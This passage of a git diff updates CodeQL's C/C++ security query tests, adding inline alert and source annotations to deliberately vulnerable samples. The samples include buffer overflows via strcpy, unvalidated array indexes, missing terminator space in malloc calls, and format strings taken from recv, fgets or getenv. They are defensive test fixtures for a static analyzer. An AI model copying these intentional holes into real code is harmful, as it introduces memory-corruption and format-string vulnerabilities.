GOOD - strcpy(ptr2->buffer, "1234567890a"); // BAD: length 12, but destination only has length 11 - strcpy(ptr2->buffer, "1234567890abcdef"); // BAD: length 17, but destination only has length 11 + strcpy(ptr2->buffer, "1234567890a"); // BAD: length 12, but destination only has length 11 // $ Alert[cpp/very-likely-overrunning-write] + strcpy(ptr2->buffer, "1234567890abcdef"); // BAD: length 17, but destination only has length 11 // $ Alert[cpp/very-likely-overrunning-write] // ... } @@ -36,14 +36,14 @@ void testMyFixedStruct() ptr1->len = 1; strcpy(ptr1->buffer, ""); // GOOD strcpy(ptr1->buffer, "1"); // GOOD - strcpy(ptr1->buffer, "12"); // BAD: length 3, but destination only has length 2 - strcpy(ptr1->buffer, "123456789"); // BAD: length 10, but destination only has length 2 + strcpy(ptr1->buffer, "12"); // BAD: length 3, but destination only has length 2 // $ Alert[cpp/very-likely-overrunning-write] + strcpy(ptr1->buffer, "123456789"); // BAD: length 10, but destination only has length 2 // $ Alert[cpp/very-likely-overrunning-write] // ... MyFixedStruct1 *ptr2 = (MyFixedStruct1*)malloc(sizeof(MyFixedStruct1) + (sizeof(char) * 10)); ptr2->len = 11; - strcpy(ptr2->buffer, "123456789"); // BAD / DUBIOUS: length 10, but destination only has length 2 - strcpy(ptr2->buffer, "1234567890abcdef"); // BAD: length 17, but destination only has length 2 + strcpy(ptr2->buffer, "123456789"); // BAD / DUBIOUS: length 10, but destination only has length 2 // $ Alert[cpp/very-likely-overrunning-write] + strcpy(ptr2->buffer, "1234567890abcdef"); // BAD: length 17, but destination only has length 2 // $ Alert[cpp/very-likely-overrunning-write] // ... } @@ -57,13 +57,13 @@ void testMyFixedStruct2() MyFixedStruct2 *ptr1 = (MyFixedStruct2 *)malloc(sizeof(MyFixedStruct2)); ptr1->len = 1; strcpy(ptr1->buffer, ""); // GOOD - strcpy(ptr1->buffer, "1"); // BAD: length 2, but destination only has length 1 - strcpy(ptr1->buffer, "123456789"); // BAD: length 10, but destination only has length 1 + strcpy(ptr1->buffer, "1"); // BAD: length 2, but destination only has length 1 // $ Alert[cpp/very-likely-overrunning-write] + strcpy(ptr1->buffer, "123456789"); // BAD: length 10, but destination only has length 1 // $ Alert[cpp/very-likely-overrunning-write] // ... MyFixedStruct2 *ptr2 = (MyFixedStruct2*)malloc(sizeof(MyFixedStruct2) + (sizeof(char) * 10)); ptr2->len = 11; strcpy(ptr2->buffer, "123456789"); // BAD: length 10, but destination only has length 1 [NOT DETECTED] - strcpy(ptr2->buffer, "1234567890abcdef"); // BAD: length 17, but destination only has length 1 + strcpy(ptr2->buffer, "1234567890abcdef"); // BAD: length 17, but destination only has length 1 // $ Alert[cpp/very-likely-overrunning-write] // ... } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/UnterminatedVarargsCall.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/UnterminatedVarargsCall.qlref index 75497f34f937..c1cd5bb0da92 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/UnterminatedVarargsCall.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/UnterminatedVarargsCall.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-121/UnterminatedVarargsCall.ql \ No newline at end of file +query: Security/CWE/CWE-121/UnterminatedVarargsCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/more_tests.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/more_tests.cpp index d6c9a3915e7f..4d58c6ffbc66 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/more_tests.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/more_tests.cpp @@ -22,7 +22,7 @@ int main() myFunction2(0, 1, -1); myFunction2(0, 1, 2, -1); myFunction2(0, 1, 2, 3, -1); - myFunction2(0, 1, 2, 3, 4); // BAD: missing terminator + myFunction2(0, 1, 2, 3, 4); // BAD: missing terminator // $ Alert myFunction3(-1); myFunction3(0, -1); @@ -36,7 +36,7 @@ int main() myFunction4(0, 0, 1, 1, 0); myFunction4(0, x, 1, 1, 1, 0); myFunction4(0, 0, 1, 1, 1, 1, 0); - myFunction4(x, 0, 1, 1, 1, 1, 1); // BAD: missing terminator + myFunction4(x, 0, 1, 1, 1, 1, 1); // BAD: missing terminator // $ Alert myFunction5('a', 'b', 'c', 0); // GOOD: ambiguous terminator myFunction5('a', 'b', 'c', 0); @@ -46,7 +46,7 @@ int main() myFunction5('a', 'b', 'c', -1); myFunction6(0.0); - myFunction6(1.0); // BAD: missing terminator + myFunction6(1.0); // BAD: missing terminator // $ Alert myFunction6(1.0, 2.0, 0.0); myFunction6(1.0, 2.0, 3.0, 0.0); myFunction6(1.0, 2.0, 3.0, 4.0, 0.0); @@ -61,8 +61,8 @@ int main() myFunction7("seven", "eight", "nine", 0); myFunction7("alpha", "beta", "gamma", 0); myFunction7("", 0); - myFunction7("yes", "no"); // BAD: missing terminator - myFunction7(); // BAD: missing terminator + myFunction7("yes", "no"); // BAD: missing terminator // $ Alert + myFunction7(); // BAD: missing terminator // $ Alert return 0; } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/tests.c b/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/tests.c index f89d19cf3c75..9ea3c57ba527 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/tests.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/tests.c @@ -31,7 +31,7 @@ void f7(char *format, ...) int main(int argc, char *argv[]) { - f1("", 1); // BAD: not terminated with 0 + f1("", 1); // BAD: not terminated with 0 // $ Alert f1("", 1, 0); f1("", 1, 1, 0); f1("", 1, 1, 1, 0); @@ -75,13 +75,13 @@ int main(int argc, char *argv[]) f6("h", 5, -1); f6("i", 5, 6, -1); f6("j", 5, 6, 7, -1); - f6("k", 5, 6, argc); // BAD: not (necessarily) terminated with -1 - f6("l"); // BAD: not terminated with -1 + f6("k", 5, 6, argc); // BAD: not (necessarily) terminated with -1 // $ Alert + f6("l"); // BAD: not terminated with -1 // $ Alert f7("", 0); f7("", 0); f7("", 0); - f7(""); // BAD: not terminated with 0 + f7(""); // BAD: not terminated with 0 // $ Alert f7("", 0); f7("", 0); f7("", 0); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c b/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c index 2092902b6658..97024d60eb34 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c @@ -27,7 +27,7 @@ void CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01_bad() { char inputBuffer[CHAR_ARRAY_SIZE] = ""; /* POTENTIAL FLAW: Read data from the console using fgets() */ - if (fgets(inputBuffer, CHAR_ARRAY_SIZE, stdin) != NULL) + if (fgets(inputBuffer, CHAR_ARRAY_SIZE, stdin) != NULL) // $ Source { /* Convert to int */ data = atoi(inputBuffer); @@ -49,7 +49,7 @@ void CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01_bad() * This code does check to see if the array index is negative */ if (data >= 0) { - buffer[data] = 1; + buffer[data] = 1; // $ Alert /* Print the array values */ for(i = 0; i < 10; i++) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected index 1fb824b35d6e..21a50d0a8fa1 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected @@ -1,3 +1,5 @@ +#select +| CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | An array indexing expression depends on $@ that might be outside the bounds of the array. | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | string read by fgets | edges | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:33:13:33:36 | ... = ... | provenance | TaintFunction | | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:33:13:33:36 | ... = ... | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | provenance | | @@ -6,5 +8,3 @@ nodes | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:33:13:33:36 | ... = ... | semmle.label | ... = ... | | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | semmle.label | data | subpaths -#select -| CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | An array indexing expression depends on $@ that might be outside the bounds of the array. | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | string read by fgets | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.qlref index f1d46d8f8d64..71a6b5581453 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-129/ImproperArrayIndexValidation.ql \ No newline at end of file +query: Security/CWE/CWE-129/ImproperArrayIndexValidation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected index 184af69e72c4..3377b266d0a2 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected @@ -1,3 +1,8 @@ +#select +| test1.c:20:16:20:16 | i | test1.c:7:26:7:29 | **argv | test1.c:20:16:20:16 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | +| test1.c:35:11:35:11 | i | test1.c:7:26:7:29 | **argv | test1.c:35:11:35:11 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | +| test1.c:43:11:43:11 | i | test1.c:7:26:7:29 | **argv | test1.c:43:11:43:11 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | +| test1.c:55:15:55:15 | j | test1.c:7:26:7:29 | **argv | test1.c:55:15:55:15 | j | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | edges | test1.c:7:26:7:29 | **argv | test1.c:8:11:8:14 | call to atoi | provenance | TaintFunction | | test1.c:8:11:8:14 | call to atoi | test1.c:9:9:9:9 | i | provenance | | @@ -30,8 +35,3 @@ nodes | test1.c:53:3:53:7 | ... = ... | semmle.label | ... = ... | | test1.c:55:15:55:15 | j | semmle.label | j | subpaths -#select -| test1.c:20:16:20:16 | i | test1.c:7:26:7:29 | **argv | test1.c:20:16:20:16 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | -| test1.c:35:11:35:11 | i | test1.c:7:26:7:29 | **argv | test1.c:35:11:35:11 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | -| test1.c:43:11:43:11 | i | test1.c:7:26:7:29 | **argv | test1.c:43:11:43:11 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | -| test1.c:55:15:55:15 | j | test1.c:7:26:7:29 | **argv | test1.c:55:15:55:15 | j | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.qlref index f1d46d8f8d64..71a6b5581453 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-129/ImproperArrayIndexValidation.ql \ No newline at end of file +query: Security/CWE/CWE-129/ImproperArrayIndexValidation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/test1.c b/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/test1.c index 89619626de91..a92689a48d32 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/test1.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/test1.c @@ -4,7 +4,7 @@ void dosomething(char c); const char chr[26] = "abcdefghijklmnopqrstuvwxyz"; -int main(int argc, char *argv[]) { +int main(int argc, char *argv[]) { // $ Source int i = atoi(argv[1]); test1(i); test2(i); @@ -17,7 +17,7 @@ int main(int argc, char *argv[]) { void test1(int i) { // BAD: i has not been validated. - char c = chr[i]; + char c = chr[i]; // $ Alert dosomething(c); } @@ -32,7 +32,7 @@ void test2(int i) { int myArray[10]; void test3(int i) { - myArray[i] = 0; // BAD: i has not been validated + myArray[i] = 0; // BAD: i has not been validated // $ Alert i = 5; @@ -40,7 +40,7 @@ void test3(int i) { } void test4(int i) { - myArray[i] = 0; // BAD: i has not been validated + myArray[i] = 0; // BAD: i has not been validated // $ Alert if ((i < 0) || (i >= 10)) return; @@ -52,7 +52,7 @@ void test5(int i) { j = i; - j = myArray[j]; // BAD: j has not been validated + j = myArray[j]; // BAD: j has not been validated // $ Alert } extern int myTable[256]; diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/NoSpaceForZeroTerminator.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/NoSpaceForZeroTerminator.qlref index 53beb09ebd71..0459fddee60f 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/NoSpaceForZeroTerminator.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/NoSpaceForZeroTerminator.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-131/NoSpaceForZeroTerminator.ql +query: Security/CWE/CWE-131/NoSpaceForZeroTerminator.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test.c b/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test.c index 551b2441a41c..15de6c31dec4 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test.c @@ -13,7 +13,7 @@ char *strcpy(char *s1, const char *s2); static void bad0(char *str) { // BAD -- Not allocating space for '\0' terminator - char *buffer = malloc(strlen(str)); + char *buffer = malloc(strlen(str)); // $ Alert strcpy(buffer, str); free(buffer); } @@ -29,7 +29,7 @@ static void good0(char *str) { static void bad1(char *str) { int len = strlen(str); // BAD -- Not allocating space for '\0' terminator - char *buffer = malloc(len); + char *buffer = malloc(len); // $ Alert strcpy(buffer, str); free(buffer); } @@ -46,7 +46,7 @@ static void good1(char *str) { static void bad2(char *str) { int len = strlen(str); // BAD -- Not allocating space for '\0' terminator - char *buffer = malloc(len); + char *buffer = malloc(len); // $ Alert strcpy(buffer, str); free(buffer); } @@ -61,7 +61,7 @@ static void good2(char *str) { static void bad3(char *str) { // BAD -- Not allocating space for '\0' terminator - char *buffer = malloc(strlen(str) * sizeof(char)); + char *buffer = malloc(strlen(str) * sizeof(char)); // $ Alert strcpy(buffer, str); free(buffer); } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test.cpp index 24032a91ef15..f6c44301a682 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test.cpp @@ -21,14 +21,14 @@ int strcmp(const char *s1, const char *s2); static void bad1(wchar_t *wstr) { // BAD -- Not allocating space for '\0' terminator - wchar_t *wbuffer = (wchar_t *)malloc(wcslen(wstr)); + wchar_t *wbuffer = (wchar_t *)malloc(wcslen(wstr)); // $ Alert wcscpy(wbuffer, wstr); free(wbuffer); } static void bad2(wchar_t *wstr) { // BAD -- Not allocating space for '\0' terminator - wchar_t *wbuffer = (wchar_t *)malloc(wcslen(wstr) * sizeof(wchar_t)); + wchar_t *wbuffer = (wchar_t *)malloc(wcslen(wstr) * sizeof(wchar_t)); // $ Alert wcscpy(wbuffer, wstr); free(wbuffer); } @@ -42,7 +42,7 @@ static void good1(wchar_t *wstr) { static void bad3(char *str) { // BAD -- zero-termination proved by sprintf (as destination) - char *buffer = (char *)malloc(strlen(str)); + char *buffer = (char *)malloc(strlen(str)); // $ Alert sprintf(buffer, "%s", str); free(buffer); } @@ -52,7 +52,7 @@ void wdecode(wchar_t *dest, wchar_t *src); static void bad4(char *str) { // BAD -- zero-termination proved by wprintf (as parameter) - char *buffer = (char *)malloc(strlen(str)); + char *buffer = (char *)malloc(strlen(str)); // $ Alert decode(buffer, str); wprintf(L"%s", buffer); free(buffer); @@ -60,7 +60,7 @@ static void bad4(char *str) { static void bad5(char *str) { // BAD -- zero-termination proved by strcat (as destination) - char *buffer = (char *)malloc(strlen(str)); + char *buffer = (char *)malloc(strlen(str)); // $ Alert buffer[0] = 0; strcat(buffer, str); free(buffer); @@ -68,7 +68,7 @@ static void bad5(char *str) { static void bad6(char *str, char *dest) { // BAD -- zero-termination proved by strcat (as source) - char *buffer = (char *)malloc(strlen(str)); + char *buffer = (char *)malloc(strlen(str)); // $ Alert decode(buffer, str); strcat(dest, buffer); free(buffer); @@ -76,7 +76,7 @@ static void bad6(char *str, char *dest) { static void bad7(char *str, char *str2) { // BAD -- zero-termination proved by strcmp - char *buffer = (char *)malloc(strlen(str)); + char *buffer = (char *)malloc(strlen(str)); // $ Alert decode(buffer, str); if (strcmp(buffer, str2) == 0) { // ... @@ -86,7 +86,7 @@ static void bad7(char *str, char *str2) { static void bad8(wchar_t *str) { // BAD -- zero-termination proved by wcslen - wchar_t *wbuffer = (wchar_t *)malloc(wcslen(str)); + wchar_t *wbuffer = (wchar_t *)malloc(wcslen(str)); // $ Alert wdecode(wbuffer, str); if (wcslen(wbuffer) == 0) { // ... @@ -103,7 +103,7 @@ static void good2(char *str, char *dest) { static void bad9(wchar_t *wstr) { // BAD -- using new - wchar_t *wbuffer = new wchar_t[wcslen(wstr)]; + wchar_t *wbuffer = new wchar_t[wcslen(wstr)]; // $ Alert wcscpy(wbuffer, wstr); delete wbuffer; } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test2.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test2.cpp index 7c7f74066976..1aca38a8f64a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test2.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test2.cpp @@ -61,14 +61,14 @@ static void bad2(wchar_t *str) { static void bad3(wchar_t *str) { // BAD -- Not allocating space for '\0' terminator - wchar_t *buffer = (wchar_t *)calloc(sizeof(wchar_t), wcslen(str)); + wchar_t *buffer = (wchar_t *)calloc(sizeof(wchar_t), wcslen(str)); // $ Alert wcscpy(buffer, str); free(buffer); } static void bad4(char *str) { // BAD -- Not allocating space for '\0' terminator - char *buffer = (char *)realloc(0, strlen(str)); + char *buffer = (char *)realloc(0, strlen(str)); // $ Alert strcpy(buffer, str); free(buffer); } @@ -81,12 +81,12 @@ void *MyMalloc2(size_t size); void customAllocatorTests(char *str) { { - char *buffer1 = (char *)MyMalloc1(strlen(str)); // BAD (no room for `\0` terminator) + char *buffer1 = (char *)MyMalloc1(strlen(str)); // BAD (no room for `\0` terminator) // $ Alert strcpy(buffer1, str); } { - char *buffer2 = (char *)MyMalloc2(strlen(str)); // BAD (no room for `\0` terminator) + char *buffer2 = (char *)MyMalloc2(strlen(str)); // BAD (no room for `\0` terminator) // $ Alert strcpy(buffer2, str); } } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected index 560ecc8bd775..79b6ff33410e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected @@ -1,3 +1,7 @@ +#select +| char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | The value of this argument may come from $@ and is being used as a formatting argument to badVaSink(data), which calls vsnprintf(format). | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | buffer read by recv | +| char_console_fprintf_01_bad.c:49:21:49:24 | *data | char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | char_console_fprintf_01_bad.c:49:21:49:24 | *data | The value of this argument may come from $@ and is being used as a formatting argument to fprintf(format). | char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | string read by fgets | +| char_environment_fprintf_01_bad.c:36:21:36:24 | *data | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | char_environment_fprintf_01_bad.c:36:21:36:24 | *data | The value of this argument may come from $@ and is being used as a formatting argument to fprintf(format). | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | an environment variable | edges | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | char_connect_socket_w32_vsnprintf_01_bad.c:100:13:100:60 | ... = ... | provenance | | | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | provenance | | @@ -21,7 +25,3 @@ nodes | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | semmle.label | *call to getenv | | char_environment_fprintf_01_bad.c:36:21:36:24 | *data | semmle.label | *data | subpaths -#select -| char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | The value of this argument may come from $@ and is being used as a formatting argument to badVaSink(data), which calls vsnprintf(format). | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | buffer read by recv | -| char_console_fprintf_01_bad.c:49:21:49:24 | *data | char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | char_console_fprintf_01_bad.c:49:21:49:24 | *data | The value of this argument may come from $@ and is being used as a formatting argument to fprintf(format). | char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | string read by fgets | -| char_environment_fprintf_01_bad.c:36:21:36:24 | *data | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | char_environment_fprintf_01_bad.c:36:21:36:24 | *data | The value of this argument may come from $@ and is being used as a formatting argument to fprintf(format). | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | an environment variable | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.qlref index 079e0c8a7c0e..9c363bfac55e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-134/UncontrolledFormatString.ql \ No newline at end of file +query: Security/CWE/CWE-134/UncontrolledFormatString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_connect_socket_w32_vsnprintf_01_bad.c b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_connect_socket_w32_vsnprintf_01_bad.c index ccba3e548403..9c177049c0fd 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_connect_socket_w32_vsnprintf_01_bad.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_connect_socket_w32_vsnprintf_01_bad.c @@ -91,7 +91,7 @@ void CWE134_Uncontrolled_Format_String__char_connect_socket_w32_vsnprintf_01_bad /* Abort on error or the connection was closed, make sure to recv one * less char than is in the recv_buf in order to append a terminator */ /* Abort on error or the connection was closed */ - recvResult = recv(connectSocket, (char *)(data + dataLen), sizeof(char) * (100 - dataLen - 1), 0); + recvResult = recv(connectSocket, (char *)(data + dataLen), sizeof(char) * (100 - dataLen - 1), 0); // $ Source if (recvResult == SOCKET_ERROR || recvResult == 0) { break; @@ -122,5 +122,5 @@ void CWE134_Uncontrolled_Format_String__char_connect_socket_w32_vsnprintf_01_bad } #endif } - badVaSink(data, data); + badVaSink(data, data); // $ Alert } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_console_fprintf_01_bad.c b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_console_fprintf_01_bad.c index 1af281b9f422..493f9a5f7de5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_console_fprintf_01_bad.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_console_fprintf_01_bad.c @@ -27,7 +27,7 @@ void CWE134_Uncontrolled_Format_String__char_console_fprintf_01_bad() /* POTENTIAL FLAW: Read data from the console */ if(100-data_len > 1) { - if (fgets(data+data_len, (int)(100-data_len), stdin) != NULL) + if (fgets(data+data_len, (int)(100-data_len), stdin) != NULL) // $ Source { /* The next 3 lines remove the carriage return from the string that is * inserted by fgets() */ @@ -46,7 +46,7 @@ void CWE134_Uncontrolled_Format_String__char_console_fprintf_01_bad() } } /* POTENTIAL FLAW: Do not specify the format allowing a possible format string vulnerability */ - fprintf(stdout, data); + fprintf(stdout, data); // $ Alert } /* goodG2B uses the GoodSource with the BadSink */ diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_environment_fprintf_01_bad.c b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_environment_fprintf_01_bad.c index f759a9d8e61e..bc9f7e9f4a86 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_environment_fprintf_01_bad.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/char_environment_fprintf_01_bad.c @@ -24,7 +24,7 @@ void CWE134_Uncontrolled_Format_String__char_environment_fprintf_01_bad() { /* Append input from an environment variable to data */ size_t data_len = strlen(data); - char * environment = GETENV(ENV_VARIABLE); + char * environment = GETENV(ENV_VARIABLE); // $ Source /* If there is data in the environment variable */ if (environment != NULL) { @@ -33,7 +33,7 @@ void CWE134_Uncontrolled_Format_String__char_environment_fprintf_01_bad() } } /* POTENTIAL FLAW: Do not specify the format allowing a possible format string 